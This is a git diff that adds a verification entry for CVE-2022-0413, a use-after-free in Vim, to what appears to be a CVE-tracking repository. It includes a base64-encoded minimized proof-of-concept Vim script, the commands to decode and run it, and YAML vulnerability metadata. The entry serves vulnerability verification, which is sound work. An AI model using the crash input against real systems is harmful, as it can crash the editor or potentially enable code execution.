diff --git a/cve/vim/2022/CVE-2022-0413/READMD.md b/cve/vim/2022/CVE-2022-0413/READMD.md new file mode 100644 index 0000000000000000000000000000000000000000..4a6cb6206ee4ec3c520b0bd0a5caffbd7415fe70 --- /dev/null +++ b/cve/vim/2022/CVE-2022-0413/READMD.md @@ -0,0 +1,6 @@ +### 漏洞验证 +```shell +$ echo -ne "ZnUgUmUwYTAoZyxuKQp+CnMvCnIwIzAKZW5kZgpzL1wlJykvXD1hMDAwKDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwLCBSZTBhMCgnJywwMDApMDA=" | base64 -d > minimized_poc +$ vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized_poc -c ":qa!" +``` +![](./png/CVE-2022-0413.png) \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-0413/minimized_poc b/cve/vim/2022/CVE-2022-0413/minimized_poc new file mode 100644 index 0000000000000000000000000000000000000000..bb42386182349bea8e8f55e78db2809094ea68b9 --- /dev/null +++ b/cve/vim/2022/CVE-2022-0413/minimized_poc @@ -0,0 +1,6 @@ +fu Re0a0(g,n) +~ +s/ +r0#0 +endf +s/\%')/\=a000(00000000000000000000000000000000, Re0a0('',000)00 \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-0413/png/CVE-2022-0413.png b/cve/vim/2022/CVE-2022-0413/png/CVE-2022-0413.png new file mode 100644 index 0000000000000000000000000000000000000000..6e982169782afe50a18518b22e97d579fe994d60 Binary files /dev/null and b/cve/vim/2022/CVE-2022-0413/png/CVE-2022-0413.png differ diff --git a/cve/vim/2022/yaml/CVE-2022-0413.yaml b/cve/vim/2022/yaml/CVE-2022-0413.yaml new file mode 100644 index 0000000000000000000000000000000000000000..6768e9a9941d0463206adeae3d6dda88a3208982 --- /dev/null +++ b/cve/vim/2022/yaml/CVE-2022-0413.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-0413 +source: https://huntr.dev/bounties/563d1e8f-5c3d-4669-941c-3216f4a87c38/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim 存在资源管理错误漏洞,该漏洞源于这个漏洞允许攻击者可利用该漏洞输入一个特别制作的文件,导致崩溃或代码执行。 + scope-of-influence: + vim < 8.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0413 + - https://github.com/vim/vim/commit/37f47958b8a2a44abc60614271d9537e7f14e51a + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-0413 + cwe-id: CWE-416 + cnvd-id: None + kve-id: None + tags: cve2022,资源管理错误,拒绝服务 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index b25c77926213d712ba8121da5a1bc744e3899933..02393161611d8d23ce1ca2dce101a921cdbc70b4 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -26,13 +26,14 @@ cve: - CVE-2021-4034 vim: - CVE-2022-0359 + - CVE-2022-0413 - CVE-2022-0417 - CVE-2022-0572 - CVE-2022-0629 - CVE-2022-0685 - CVE-2022-0714 - CVE-2022-0729 - openssh: + openssl: - CVE-2022-1292 cnvd: kve: